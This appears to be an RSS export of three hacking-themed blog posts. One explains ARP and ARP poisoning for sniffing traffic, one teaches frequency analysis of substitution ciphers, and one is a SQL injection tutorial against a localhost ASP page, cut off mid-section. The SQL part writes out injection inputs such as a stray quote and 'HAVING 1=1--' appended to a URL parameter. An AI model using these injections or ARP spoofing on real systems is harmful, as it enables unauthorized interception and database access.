&lt;br /&gt;
&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;What is ARP?&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Address Resolution Protocol (ARP) is a method for finding a host&#39;s MAC  address when only the IP is known. If a computer wants to communicate  with another computer over a network it will first see if it already  knows the MAC address, if not it will send out a an ARP request in order  get it. An ARP request is one of four types of messages in ARP. But the  two main types is ARP request and ARP reply, which I will be covering  in this article. The ARP request contains the senders MAC address and  IP, and it requests the MAC address of the given IP. The reason that it  is holding the senders MAC and IP, is so that the receiver can update  his ARP cache with this information too, before he sends the reply with  his MAC. Did I hear you ask what an ARP cache is? It is a temporary  storage place on your computer that associates IP addresses of other  computers with MAC addresses.&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: lime;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;What is ARP Poisoning?&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Now, if you want to sniff the network, you have to get the traffic to go  through you. One way to do this is ARP Poisoning. The weakness is: All  computers will accept an ARP reply, even if there never where an ARP  request. In other words, you can send a customized ARP reply to your  target computers, which will update their ARP cache with a new MAC  address - yours. So when a computer wants to send something to another  computer, it will find it&#39;s MAC address in the ARP cache based on the IP  - that MAC address is now your MAC address. So when it sends something  to the MAC address, it sends it to you. But keep in mind, you have to  send the packets on, or you will end up with a DoS. Another thing you  have to think of, is that from time to time the ARP cache of a computer  gets flushed, if there is no traffic. So you have to send a new  customized ARP reply to the targets like every 10th second or so, but  this can be done automatically.&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;</description><link>http://amit-spot.blogspot.com/2010/11/arp-poisoning.html</link><author>noreply@blogger.com (Amit Tyagi)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9aGj9fz__Oi6t5da2_XhHGbmMss7q1_gO8jYKAISJjQD03mPiViqsL-HJKVEKLVRyPSCs55Pg1d3tuNHX-Oz7ybjWvFJwbz6K-nloMCJYKuAzj26VgRE4ZkehKZ5VdLYYCxPQ1_LbunY/s72-c/arp2.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4201259273499093708.post-1671982836043346753</guid><pubDate>Thu, 11 Nov 2010 18:09:00 +0000</pubDate><atom:updated>2011-02-24T04:18:43.230-08:00</atom:updated><title>Cryptography- An Introduction</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div style=&quot;color: lime;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyu6RbAiKrzzTadJOgIDtVbKQntE4UgjOQ0YJ6ISumQXXQrlQnpgAK2OuIl9-UtuWw6-3pGSyyFNJ5m0ofQrM-MlEdZLePbN6Oy_CxEUMpXXE4HTelHLcYsgT4jjvAGT6kd7YZJ-L7yVk/s1600/crypt.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyu6RbAiKrzzTadJOgIDtVbKQntE4UgjOQ0YJ6ISumQXXQrlQnpgAK2OuIl9-UtuWw6-3pGSyyFNJ5m0ofQrM-MlEdZLePbN6Oy_CxEUMpXXE4HTelHLcYsgT4jjvAGT6kd7YZJ-L7yVk/s1600/crypt.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;i&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Cryptography- The VERY Basics&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;br /&gt;
This guide is used for educational and learning purposes only. In some countries and states, encryption may be deemed illegal in your system of law, so make sure you research the government view on data encryption/decryption for your current location before trying anything mentioned in this guide.&lt;br /&gt;
&lt;br /&gt;
Early on in the learning of cryptography, one may come across a very basic and easily decoded method of encryption: ASCII shifts or substitution. Substitution is generally taking a block of characters and replacing one character with another. For example:&lt;br /&gt;
&lt;br /&gt;
CODE :&lt;br /&gt;
&lt;div style=&quot;color: blue;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #cc0000;&quot;&gt;I LOVE HACKING&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
If you shifted each letter one step forward in the alphabet, this message would become:&lt;br /&gt;
&lt;br /&gt;
CODE :&lt;br /&gt;
&lt;div style=&quot;color: blue;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #cc0000;&quot;&gt;J MPWF IBDLJOH&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
This is probably the easiest method of encryption to decode, and should by no means used to hide or secure important data.&lt;br /&gt;
&lt;br /&gt;
Now, we will attempt to decode another message of which I will not tell you the character shift amount of. We will go through it step by step in an attempt to decode it.&lt;br /&gt;
&lt;br /&gt;
CODE :&lt;br /&gt;
&lt;div style=&quot;color: blue;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #cc0000;&quot;&gt;S YPC YRRCKNRGLE RFC AMBC – CLB.&lt;/span&gt;&lt;/div&gt;*The dash and period go unchanged.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
At a first glance, this appears to be complete gibberish, but looking back we notice somebody may have some top secret information stored in this random jumble of letters. Our first step to solving the character shift is the letter E. Following the space, the letter E is the most commonly used letter in the English alphabet. Let us begin by picking this message apart. Look for the most common character that appears… which just so happens to be the letter C. Following the letter frequency count, this should mean that the letter C has replaced the letter E. So… replace every letter C with the letter E. I choose to start case-insensitive substitution decryptions in uppercase or make changes in bold so that any changes are apparent. This prevents changing an already changed character.&lt;br /&gt;
&lt;br /&gt;
CODE :&lt;br /&gt;
&lt;div style=&quot;color: blue;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #cc0000;&quot;&gt;S YPe YRReKNRGLE RFe AMBe – eLB.&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
Now, you have just completed your first step in decoding this message. If you have looked up a character frequency chart, you would now know that T is the next most used letter. R appears to be the next most used character… so replace it with T.&lt;br /&gt;
&lt;br /&gt;
CODE :&lt;br /&gt;
&lt;div style=&quot;color: blue;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #cc0000;&quot;&gt;S YPc YtteKNtGLE tFe AMBe – eLB.&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
Now, or occasionally after another character or two, you can probably decode the character shift value. You could have done this after the first decoded letter, but we were having too much fun and never thought about that, right?&lt;br /&gt;
&lt;br /&gt;
From what we have seen so far, we can tell that, by looking at a numbered alphabetic chart, that the character offset is two values behind its original character. E became C and R became T. Now that you know the offset value, you can begin to decode the remaining parts of the message. In the end, the message works out to be:&lt;br /&gt;
&lt;br /&gt;
CODE :&lt;br /&gt;
&lt;div style=&quot;color: blue;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #cc0000;&quot;&gt;U ARE ATTEMPTING THE CODE – END.&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
Please excuse this… error-filled example, as I am not good at thinking up point-proving examples on the spot.&lt;br /&gt;
&lt;br /&gt;
Another method you could use to uncover the substitutions for another letter is a commonly used word. After uncovering the substitutions for T and E, what word starts with T, ends with E, and is three letters? You guessed it - THE. Most of the time, if you notice that there are repeated tAe parts of encrypted characters, where A represents an encrypted character, the word is likely THE. This is practically the case for all of these occurrences if tAe appears multiple times… unless the encoder has a foot fetish and has encoded some dirty thoughts. If you thought I meant the word TOE at the beginning of this paragraph, you were horribly mistaken. THE is the most commonly used word, right after TO.&lt;br /&gt;
&lt;br /&gt;
Although in my example, replacing F with H would only change one character in the entire text, which is practically useless in this example. For larger sentences, this could greatly aid you with reverting substitution. It provides you with another decoded character, and a complete word to help you make sense of a partially decrypted phrase.&lt;br /&gt;
&lt;br /&gt;
As many of you may have pondered earlier on in this article, what if you substitute characters with a random pattern, rather than A -/+ N (where A is the letter and N is the character offset) constantly throughout the entire phrase. For example, one could replace the letter A with B, and C with X. This method is only just slightly more difficult to decode than a fixed character offset. You would just have to decode a large enough amount of characters to make sense of a word or phrase, then you can fill in that part of the message, revealing several more characters in the process.&lt;br /&gt;
&lt;br /&gt;
Now, a slightly more challenging message to decode... but possible to do in several minutes. Give it a go and see if you can work it out yourself first. I will tell you now that I have a trick up my sleeve that many of you will have forgot about by this point in the article.&lt;br /&gt;
&lt;br /&gt;
CODE :&lt;br /&gt;
&lt;div style=&quot;color: blue;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #cc0000;&quot;&gt;5P XHVZGXEACJWXDCYXIBLM RXCK AX5P X73QFXRCN&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
Give up? What if I told you that I changed the space character? That is correct. I replaced the space character with a letter, and replaced a letter with the space character. Bet that threw you off, no? Try again now that you know that valuable piece of information. Another tiny little hint which will help if you get enough figured out - the phrase is used by some font developers to display their fonts.&lt;br /&gt;
&lt;br /&gt;
Still stumped? All right, all right, I suppose I could give you another hint.&lt;br /&gt;
&lt;br /&gt;
CODE :&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;color: blue;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #cc0000;&quot;&gt;SPACE = X&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #cc0000;&quot;&gt;O = C&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: blue;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #cc0000;&quot;&gt;E = SPACE&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
As you probably have noticed now, O is the most common letter used in this phrase. I find that many small phrases or single words do not use the letter E as many times as a longer collection of words does.&lt;br /&gt;
&lt;br /&gt;
This was a little more difficult, any some beginners may not have successfully decoded it, so here is a spoiler. Just for fun.&lt;br /&gt;
&lt;br /&gt;
CODE :&lt;br /&gt;
&lt;div style=&quot;color: blue;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: #cc0000;&quot;&gt;THE QUICK BROWN FOX JUMPED OVER THE LAZY DOG&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
Well, hopefully this guide has taught the beginner cryptologists out there some new information. Possibly some more advanced people learned a fact or two, or could find an error in my article. Please post comments&lt;/div&gt;</description><link>http://amit-spot.blogspot.com/2010/11/cryptography-very-basics-this-guide-is.html</link><author>noreply@blogger.com (Amit Tyagi)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyu6RbAiKrzzTadJOgIDtVbKQntE4UgjOQ0YJ6ISumQXXQrlQnpgAK2OuIl9-UtuWw6-3pGSyyFNJ5m0ofQrM-MlEdZLePbN6Oy_CxEUMpXXE4HTelHLcYsgT4jjvAGT6kd7YZJ-L7yVk/s72-c/crypt.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4201259273499093708.post-1172334325055813523</guid><pubDate>Thu, 11 Nov 2010 18:02:00 +0000</pubDate><atom:updated>2010-11-13T02:12:16.916-08:00</atom:updated><title>Very Basic View On SQL Injections</title><description>&lt;table border=&quot;0&quot; cellpadding=&quot;3&quot; cellspacing=&quot;2&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td class=&quot;light-td&quot; colspan=&quot;2&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzOHz-1o5ieS7RGLnbWjtarpQTGiFtEr_pbRy1dcwBOfhZLQIl5RwZeuBwt0rQe8NJNzHHwCKUvnDC-wbnevL0U_uLSgfZoS_CTwOEDvUfn25R5MhjudAuPgKoCptQh9-DrHax4-kXO-c/s1600/sql.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzOHz-1o5ieS7RGLnbWjtarpQTGiFtEr_pbRy1dcwBOfhZLQIl5RwZeuBwt0rQe8NJNzHHwCKUvnDC-wbnevL0U_uLSgfZoS_CTwOEDvUfn25R5MhjudAuPgKoCptQh9-DrHax4-kXO-c/s1600/sql.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-size: 18px;&quot;&gt;      &lt;b&gt;&lt;br /&gt;
&lt;/b&gt;     &lt;/span&gt;    &lt;/td&gt;   &lt;/tr&gt;
&lt;tr&gt;    &lt;td class=&quot;dark-td&quot; colspan=&quot;2&quot; style=&quot;font-size: 10px;&quot;&gt;&lt;/td&gt;   &lt;/tr&gt;
&lt;tr&gt;    &lt;td align=&quot;left&quot; class=&quot;light-td&quot; colspan=&quot;2&quot; style=&quot;font-size: 12px;&quot;&gt;&lt;div align=&quot;left&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i style=&quot;color: lime;&quot;&gt;&lt;b&gt;Introduction-&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;I&#39;ve seen a lot of short tutorials on SQL injections and then again some  which rivals the Great Wall of China in length, but I&#39;ve very rarely  seen a SQL injection tutorial based on an actual hack where things  aren&#39;t always ideal.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This guide will attempt to explain the very basics of SQL injections.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This tutorial is written from a website created by a friend of mine  which was loaded on my local host.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;After navigating around for a while I found something interesting&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;http://localhost/news/display.asp?id=75&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-------------------------------------------------------------------&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i style=&quot;color: lime;&quot;&gt;&lt;b&gt;Section 1 - A Quick Glance at SQL Statements&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
-------------------------------------------------------------------&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Anyone who&#39;s ever taken a look at SQL injections won&#39;t be surprised to  know what I did next...&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;http://localhost/news/display.asp?id=75&#39;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Unclosed quotation mark after the character string &#39;&#39;.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;So for all of you who don&#39;t know why I&#39;m getting the error:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The ID is passed (posted) to the SQL server and added in the query...&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;SQL SELECT queries consists of 3 basic building blocks, &lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;1) SELECT&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 2) FROM&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 3) WHERE&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;SELECT is used to specify what information should be returned, usually  column  names are used here&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;FROM specifies where the information that you want to select is  contained, usually a table name&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;WHERE is used to specify conditions, data will be only be selected if  the data set matches the conditions.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Let&#39;s take the following example of a table called &quot;Demo&quot; which consists  of the columns, &quot;ID&quot;, &quot;Text&quot;, &quot;Active&quot; and &quot;GROUP&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;TBLDEMO&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; ID TEXT  ACTIVE  GROUP&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 1 First Result TRUE  0 &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 2 Second Result FALSE  54&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 3 Third Result TRUE  54 &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 4 Fourth Result FALSE  36&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 5 RAMBO  FALSE  1&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; 6 NULL  TRUE  0 &lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Now based on this information the query&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;SELECT Text, ACTIVE, GROUP FROM TBLDEMO;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Should produce the following results:&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;First Result TRUE  0&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Second Result FALSE  54&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Third Result TRUE  54&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; Fourth Result FALSE  36&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt; RAMBO  FALSE  1&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;   TRUE  0&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Notice how &quot;NULL&quot; is not displayed at all...&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This is because a NULL value literally means nothing. &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;0 is an actual value, it means 1 less than 1 and 1 more than -1.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This is a very very important difference to understand, since some  columns are set to accept NULL values, while others don&#39;t!&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;SELECT TEXT from TBLDEMO where Active = TRUE;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: yellow;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;First Result&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;color: blue; font-size: small;&quot;&gt; Third Result&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br style=&quot;color: blue;&quot; /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;These are all the values for the column text WHERE the &quot;ACTIVE&quot; column  has a value equal to TRUE.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;SELECT TEXT from TBLDEMO where Active &amp;lt;&amp;gt; False;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Would produce the same result as in the example above.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Got it? It&#39;s a lot like playing battleship, one player calls A4, based  on the data in front of the other player a response of either &quot;miss&quot; or  &quot;hit&quot; is generated. It&#39;s not always that easy though, SQL queries can  become very very complicated, this is the absolute basics.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
-------------------------------------------------------------------&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b style=&quot;color: lime;&quot;&gt;&lt;i&gt;Section 2 - Gathering the Information&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
-------------------------------------------------------------------&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Finding a point of reference&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Carrying on from http://localhost/news/display.asp?id=75&#39;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Unclosed quotation mark after the character string &#39;&#39;.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;An educated guess would tell me that ID in the query string is used a  sql query which goes something like this:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;SELECT title, author, description, synopsis, date FROM  tblwhichcontainsNewsItems WHERE ID = X&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Where X is replaced with the value from the URL,&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Which means if I do this http://localhost/news/display.asp?id=75+HAVING  1=1--&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
